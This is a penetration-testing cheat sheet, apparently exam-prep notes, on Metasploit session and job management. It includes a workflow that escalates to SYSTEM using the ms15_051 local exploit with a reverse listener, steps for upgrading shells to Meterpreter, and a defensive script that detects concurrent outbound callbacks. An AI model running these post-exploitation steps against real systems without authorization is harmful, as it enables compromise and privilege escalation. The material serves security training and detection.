🛡️ Methodology Checklist
- List active sessions: `sessions -l`
- Interact with session: `sessions -i [ID]`
- Background current session: `Ctrl+Z` or `background`
- Kill a session: `sessions -k [ID]`
- List background jobs: `jobs`
- Kill a job: `jobs -k [ID]`
- Upgrade shell to Meterpreter: `sessions -u [ID]`
- Run command across all sessions: `sessions -C [CMD]`
🎯 Operational Context
Use when: Managing multiple sessions and background jobs in MSF — multi-target engagements require clean session organization.
Think Dumber First: sessions -l before touching anything. Know what sessions you have and which host they’re on. Use -i [ID] to interact; background (Ctrl+Z) to push back. Never kill a session without noting the target — you may not get it back.
Skip when: Single-target lab — session management overhead not needed.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sessions | List all active sessions |
| sessions -l | List sessions (explicit flag) |
| sessions -i [ID] | Interact with a specific session |
| background | Background active Meterpreter session |
| [Ctrl+Z] | Background current session (keyboard shortcut) |
| exploit -j | Run exploit as background job (non-blocking) |
| jobs -l | List all running jobs |
| jobs -k [ID] | Kill a specific job |
| jobs -K | Kill ALL running jobs |
| jobs -h | Job management help |
| use post/multi/recon/local_exploit_suggester | Load local privesc suggester module |
| set SESSION [ID] | Assign post module to a backgrounded session |
| use post/multi/manage/shell_to_meterpreter | Upgrade dumb shell to Meterpreter |
🔬 Deep Dive & Workflow
Sessions — Persistent Connections
A session is a managed channel between msfconsole and a compromised target. Sessions persist independently of what module you’re running, so you can:
- Background one session → run a scanner on a new target → come back
- Chain multiple sessions (initial shell → post-module → SYSTEM session)
Jobs — Background Tasks
Jobs are MSF-level background tasks, typically listeners. Unlike sessions (which are connections), jobs are processes waiting for a connection.
| | Session | Job |
|---|---|---|
| What it is | Active shell/Meterpreter | Waiting listener or task |
| Created by | Exploit success | exploit -j or handler |
| Killed by | sessions -k [ID] | jobs -k [ID] |
| Port binding | No | Yes — holds the port |
Post-Exploitation Workflow with Sessions
```
# 1. Get initial shell (Session 1 created)
exploit
# 2. Background it
background    # or press Ctrl+Z
# 3. Load post module
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# 4. Use a suggested exploit, link to same session
use exploit/windows/local/ms15_051_client_copy_image
set SESSION 1
set LHOST tun0
run
# New Session 2 opens as SYSTEM
```
Common Issues & Fixes
“Exploit completed, but no session was created”
Don’t panic. Check jobs -l — the listener might still be running waiting for the callback. Try browsing to the URL or triggering the payload again.
“Address already in use” on listener port
Old job is holding the port:
```
jobs -l       # find the job ID
jobs -k [ID]  # kill it
```
Or use jobs -K to clear all jobs at once.
Upgrading a Dumb Shell to Meterpreter
```
background
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
sessions -i 2    # interact with new Meterpreter session
```
CPTS Exam Checklist
- Always use `tun0` for LHOST, not LAN IP
- Check `jobs -l` before “exploit has no session” panic
- Use `jobs -K` when switching exploits to avoid port conflicts
- Background sessions with `Ctrl+Z` — don’t `exit` (that kills the shell)
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Session closed unexpectedly | Network timeout or AV killed process | Check sessions -l — dead sessions show as ‘Closed’; re-exploit if needed |
| Background job consuming too much CPU | Scanner or brute-force job | jobs -l to list; jobs -k [ID] to kill runaway jobs |
| sessions -i opens wrong session | Tab-complete or wrong ID | Verify: sessions -l shows Host column — match IP to intended target |
| Session upgrade to Meterpreter fails | Shell session on wrong arch | Use post/multi/manage/shell_to_meterpreter and verify LHOST/LPORT are accessible |
| Multiple sessions from same host | Payload ran multiple times | sessions -k [ID] to kill duplicates; keep only one stable session per host |
📝 Reporting Trigger
Finding Title: Multiple Simultaneous Meterpreter Sessions Across Compromised Hosts
Impact: Concurrent Meterpreter sessions across multiple hosts indicate wide-scale compromise with persistent access to multiple network segments, enabling coordinated lateral movement and data exfiltration.
Root Cause: Vulnerable services across multiple hosts exploited in sequence using MSF multi-handler. No session anomaly detection.
Recommendation: Implement network monitoring to detect multiple simultaneous outbound connections to external IPs. Alert on new outbound connections from server workloads. Isolate and re-image all compromised hosts.
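
One way to prototype the monitoring recommendation above: flag any external IP:port that holds connections from several internal hosts at the same moment, which is how sessions calling back to one listener appear in flow data. This is an added example, not part of the original page; the flow-record layout, the `INTERNAL_NETS` range and all sample addresses are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8")]  # assumption: the site's internal range

# Constructed flow records: start end src_ip dst_ip dst_port
SAMPLE_FLOWS = """\
2024-05-01T10:00:05 2024-05-01T11:30:00 10.10.20.11 203.0.113.50 4444
2024-05-01T10:12:40 2024-05-01T11:29:10 10.10.20.15 203.0.113.50 4444
2024-05-01T10:20:00 2024-05-01T11:28:00 10.10.30.7 203.0.113.50 4444
2024-05-01T10:01:00 2024-05-01T10:01:02 10.10.20.11 198.51.100.9 443
2024-05-01T10:30:00 2024-05-01T10:30:03 10.10.20.15 198.51.100.9 443
2024-05-01T09:00:00 2024-05-01T09:40:00 10.10.20.11 10.10.30.7 445
"""

def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL_NETS)

def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        start, end, src, dst, port = line.split()
        flows.append((datetime.fromisoformat(start), datetime.fromisoformat(end),
                      src, dst, int(port)))
    return flows

def shared_external_endpoints(flows, min_hosts=2):
    """Map (dst_ip, dst_port) -> internal hosts connected to it at the same
    moment, for external endpoints reaching at least min_hosts hosts."""
    by_dst = defaultdict(list)
    for start, end, src, dst, port in flows:
        if is_internal(src) and not is_internal(dst):  # outbound traffic only
            by_dst[(dst, port)].append((start, end, src))
    findings = {}
    for endpoint, conns in by_dst.items():
        best = set()
        for t, _, _ in conns:  # peak overlap always occurs at some flow's start
            live = {src for start, end, src in conns if start <= t < end}
            if len(live) > len(best):
                best = live
        if len(best) >= min_hosts:
            findings[endpoint] = sorted(best)
    return findings

if __name__ == "__main__":
    for (dst, port), hosts in shared_external_endpoints(parse_flows(SAMPLE_FLOWS)).items():
        print(f"ALERT {dst}:{port} has concurrent connections from {hosts}")
```

The two short, non-overlapping connections to the second external address are not flagged, and the internal-to-internal flow is ignored because only outbound traffic is considered.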